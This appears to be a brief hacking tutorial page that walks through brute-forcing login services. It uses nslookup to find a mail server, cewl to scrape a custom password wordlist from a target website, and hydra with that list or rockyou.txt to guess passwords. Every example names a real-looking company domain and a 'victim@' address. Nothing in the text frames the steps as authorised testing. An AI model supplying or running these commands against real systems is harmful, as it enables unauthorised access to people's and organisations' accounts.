Planet Red

BruteForce

To brute force SMTP, FTP, SSH, MySQL or other services you can use a simple tool located in Kali Linux, Hydra.

Locate email address / username and email server. 

Command: nslookup <DOMAIN>

Example: nslookup bostondynamics.com.au

Generate a worlist using cewl or use rockyou.txt

CEWL Method

Command: cewl –write customwordlist.txt –depth 5 –min_word_length 8 https://<domain> –verbose

Example: cewl –write customwordlist.txt –depth 5 –min_word_length 8 https://bostondynamics.com.au –verbose

Brute force attack on server using email address and wordlist for password

Command: hydra -l <USERNAME> -P <WORDLIST> <SERVICE>://<SERVER>

Example: hydra -l victim@bostondynamics.com.au -P rockyou.txt smtp://bostondynamics.com.au

For a precise and faster bruteforce use the cewl method to create a wordlist by scanning the site for keywords. You can then use the custom wordlist with hydra. Alternatively you can use rockyou.txt which is a default wordlist with Kali Linux with more than 14 million possible password combinations.